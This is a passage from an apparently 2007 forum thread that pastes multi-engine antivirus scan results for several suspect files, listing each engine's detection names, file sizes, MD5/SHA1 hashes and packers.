VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 9216 bytes
MD5: b1682db94c7ab7bb53aa90d67df72d42
SHA1: c24da5e473abc41954347b406c9ea84754241c38
packers: UPack
[/QUOTE]
[QUOTE]
Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 BDS/Afcore.cb.2.B
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm
eTrust-Vet 31.1.5004 2007.07.25 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
Microsoft 1.2704 2007.07.26 -
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
Panda 9.0.0.4 2007.07.26 -
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Additional information
File size: 58880 bytes
MD5: 4b137cb5b8291dc7d71de53299826db5
SHA1: 1a21926475389802039e4943cf2060921c11997a
packers: UPX
packers: UPX
packers: UPX
[/QUOTE]
-
File _________________________________ received on 07.26.2007 16:57:15
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
Avast 4.7.997.0 2007.07.26 -
AVG 7.5.0.476 2007.07.26 -
BitDefender 7.2 2007.07.26 -
CAT-QuickHeal 9.00 2007.07.25 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
[B]eTrust-Vet 31.1.5004 2007.07.25 HTML/Mallar[/B]
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5083 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 Virus:HTML/Allaple.A[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 HTML/Instancob.A[/B]
Rising 19.33.32.00 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -[/QUOTE]
Additional information
File size: 21071 bytes
MD5: 03bfb34583fcd2b913f4bb9be182bc3f
SHA1: a47e0e7bc5ee907faba6a69f4a1cc65f76a8f06d
-
AhnLab-V3 2007.7.27.0 2007.07.26 -
AntiVir 7.4.0.50 2007.07.26 -
Authentium 4.93.8 2007.07.25 -
[B]Avast 4.7.997.0 2007.07.26 Win32:Spyware-gen.[/B]
AVG 7.5.0.476 2007.07.26 -
[B]BitDefender 7.2 2007.07.26 Application.Cool.Remote.Control.1.2[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.26 -
DrWeb 4.33 2007.07.26 -
eSafe 7.0.15.0 2007.07.24 -
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.26 -
FileAdvisor 1 2007.07.26 -
Fortinet 2.91.0.0 2007.07.26 -
F-Prot 4.3.2.48 2007.07.25 -
F-Secure 6.70.13030.0 2007.07.26 -
Ikarus T3.1.1.8 2007.07.26 -
Kaspersky 4.0.2.24 2007.07.26 -
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.26 RemoteAccess:Win32/CoolRemoteControl[/B]
NOD32v2 2423 2007.07.26 -
Norman 5.80.02 2007.07.26 -
[B]Panda 9.0.0.4 2007.07.26 Generic Malware[/B]
Rising 19.33.32.00 2007.07.26 -
Prevx1 V2 2007.07.26 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.26 -
TheHacker 6.1.7.154 2007.07.26 -
VBA32 3.12.2.1 2007.07.24 -
VirusBuster 4.3.26:9 2007.07.26 -
Webwasher-Gateway 6.5.3 2007.07.26 -
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4
-
File 1.scr received on 07.27.2007 16:12:33 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Crypt.XPACK.Gen[/B]
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.27 -
AVG 7.5.0.476 2007.07.27 -
[B]BitDefender 7.2 2007.07.27 Trojan.PWS.LDPinch.TAW
CAT-QuickHeal 9.00 2007.07.26 (Suspicious) - DNAScan[/B]
ClamAV 0.91 2007.07.27 -
DrWeb 4.33 2007.07.27 -
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -
Fortinet 2.91.0.0 2007.07.27 -
F-Prot 4.3.2.48 2007.07.27 -
[B]F-Secure 6.70.13030.0 2007.07.27 Packed.Win32.PolyCrypt.b
Ikarus T3.1.1.8 2007.07.27 Trojan-Downloader.Win32.Small.cyn
Kaspersky 4.0.2.24 2007.07.27 Packed.Win32.PolyCrypt.b[/B]
McAfee 5084 2007.07.26 -
[B]Microsoft 1.2704 2007.07.27 Trojan:Win32/Anomaly.gen!A[/B]
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.27 -
[B]Rising 19.33.42.00 2007.07.27 Packer.RyCrypt
Sophos 4.19.0 2007.07.26 Mal/Basine-C[/B]
Sunbelt 2.2.907.0 2007.07.26 -
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
VBA32 3.12.2.1 2007.07.27 -
[B]VirusBuster 4.3.26:9 2007.07.27 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.27 Trojan.Crypt.XPACK.Gen[/B]
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f
-
T-11377
[code] File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 HEUR/Crypted[/B]
[B]Authentium 4.93.8 2007.07.27 Possibly a new variant of W32/Threat-HLLSI-based!Maximus[/B]
Avast 4.7.997.0 2007.07.27 -
[B]AVG 7.5.0.476 2007.07.27 PSW.Generic5.KY
BitDefender 7.2 2007.07.27 Trojan.PWS.Goldun.SYT[/B]
CAT-QuickHeal 9.00 2007.07.26 -
ClamAV 0.91 2007.07.27 -
[B]DrWeb 4.33 2007.07.27 Trojan.PWS.GoldSpy
eSafe 7.0.15.0 2007.07.24 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5008 2007.07.26 -
Ewido 4.0 2007.07.27 -
FileAdvisor 1 2007.07.27 -[B]
Fortinet 2.91.0.0 2007.07.27 Dowdec!tr
F-Prot 4.3.2.48 2007.07.27 W32/Threat-HLLSI-based!Maximus
F-Secure 6.70.13030.0 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
[B]Ikarus T3.1.1.8 2007.07.27 Trojan-PWS.Goldun.SYT
Kaspersky 4.0.2.24 2007.07.27 Trojan-Spy.Win32.Goldun.pc[/B]
McAfee 5084 2007.07.26 -
Microsoft 1.2704 2007.07.27 -
NOD32v2 2425 2007.07.27 -
Norman 5.80.02 2007.07.27 -
[B]Panda 9.0.0.4 2007.07.27 Dialer.KMO[/B]
Rising 19.33.42.00 2007.07.27 -
[B]Sophos 4.19.0 2007.07.26 Troj/Dowdec-Gen
Sunbelt 2.2.907.0 2007.07.26 VIPRE.Suspicious[/B]
Symantec 10 2007.07.27 -
TheHacker 6.1.7.155 2007.07.27 -
[B]VBA32 3.12.2.1 2007.07.27 suspected of Downloader.Small.33[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.27 Heuristic.Crypted[/B]
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.[/code]
-
File loader.exe received on 07.28.2007 14:59:45 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
[B]AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz[/B]
Authentium 4.93.8 2007.07.27 -
[B]Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD[/B]
[B]AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ[/B]
[B]BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4[/B]
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.28 -
[B]DrWeb 4.33 2007.07.28 DLOADER.Trojan[/B]
[B]eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm[/B]
[B]eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A[/B]
Ewido 4.0 2007.07.28 -
FileAdvisor 1 2007.07.28 -
[B]Fortinet 2.91.0.0 2007.07.28 Heuri.E[/B]
[B]F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus[/B]
[B]F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
[B]Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc[/B]
[B]Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.28 -
[B]NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus[/B]
[B]Norman 5.80.02 2007.07.27 W32/Downloader[/B]
[B]Panda 9.0.0.4 2007.07.28 Generic Malware[/B]
[B]Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab[/B]
[B]Sophos 4.19.0 2007.07.26 Mal/Heuri-E[/B]
[B]Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz[/B]
Symantec 10 2007.07.28 -
[B]TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz[/B]
[B]VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz[/B]
VirusBuster 4.3.26:9 2007.07.27 -
[B]Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz[/B]
Additional information
File size: 1020 bytes
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0
-
File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: Loading ... finished
Loading server information...
Compact
Print results Antivirus Version Last Update Result
AhnLab-V3 2007.7.28.0 2007.07.27 -
AntiVir 7.4.0.50 2007.07.30 -
Authentium 4.93.8 2007.07.27 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
BitDefender 7.2 2007.07.30 -
CAT-QuickHeal 9.00 2007.07.28 -
ClamAV 0.91 2007.07.30 -
DrWeb 4.33 2007.07.30 -
[B]eSafe 7.0.15.0 2007.07.29 suspicious Trojan/Worm[/B]
eTrust-Vet 31.1.5010 2007.07.28 -
Ewido 4.0 2007.07.29 -
FileAdvisor 1 2007.07.30 -
Fortinet 2.91.0.0 2007.07.30 -
F-Prot 4.3.2.48 2007.07.27 -
F-Secure 6.70.13030.0 2007.07.30 -
[B]Ikarus T3.1.1.8 2007.07.29 Backdoor.Win32.Delf.apa[/B]
Kaspersky 4.0.2.24 2007.07.30 -
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.30 -
NOD32v2 2428 2007.07.30 -
Norman 5.80.02 2007.07.27 -
Panda 9.0.0.4 2007.07.29 -
Rising 19.34.00.00 2007.07.30 -
Sophos 4.19.0 2007.07.26 -
Sunbelt 2.2.907.0 2007.07.28 -
Symantec 10 2007.07.30 -
TheHacker 6.1.7.158 2007.07.30 -
VBA32 3.12.2.1 2007.07.30 -
VirusBuster 4.3.26:9 2007.07.29 -
[B]Webwasher-Gateway 6.0.1 2007.07.30 Win32.ModifiedUPX.gen!90 (suspicious)[/B]
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
packers: UPX
packers: UPX
-
File sms.exe received on 07.31.2007 07:49:38 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.31.1 2007.07.31 -
[B]AntiVir 7.4.0.54 2007.07.30 HEUR/Crypted[/B]
Authentium 4.93.8 2007.07.30 -
Avast 4.7.997.0 2007.07.30 -
AVG 7.5.0.476 2007.07.30 -
[B]BitDefender 7.2 2007.07.31 Trojan.PWS.LDPinch.TAW[/B]
CAT-QuickHeal 9.00 2007.07.30 -
ClamAV 0.91 2007.07.31 -
DrWeb 4.33 2007.07.31 -
eSafe 7.0.15.0 2007.07.29 -
eTrust-Vet 31.1.5018 2007.07.31 -
Ewido 4.0 2007.07.30 -
FileAdvisor 1 2007.07.31 -
Fortinet 2.91.0.0 2007.07.31 -
F-Prot 4.3.2.48 2007.07.30 -
F-Secure 6.70.13030.0 2007.07.31 -
Ikarus T3.1.1.8 2007.07.31 -
Kaspersky 4.0.2.24 2007.07.31 -
[B]McAfee 5086 2007.07.30 New Malware.ek[/B]
Microsoft 1.2704 2007.07.30 -
NOD32v2 2429 2007.07.30 -
[B]Norman 5.80.02 2007.07.30 Suspicious_P.gen[/B]
Panda 9.0.0.4 2007.07.31 -
Prevx1 V2 2007.07.31 -
Rising 19.34.11.00 2007.07.31 -
[B]Sophos 4.19.0 2007.07.26 Mal/Basine-C
Sunbelt 2.2.907.0 2007.07.31 VIPRE.Suspicious[/B]
Symantec 10 2007.07.31 -
TheHacker 6.1.7.159 2007.07.31 -
VBA32 3.12.2.2 2007.07.30 -
[B]VirusBuster 4.3.26:9 2007.07.30 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 2007.07.31 Heuristic.Crypted[/B]
Page generated in 0.01063 seconds with 10 queries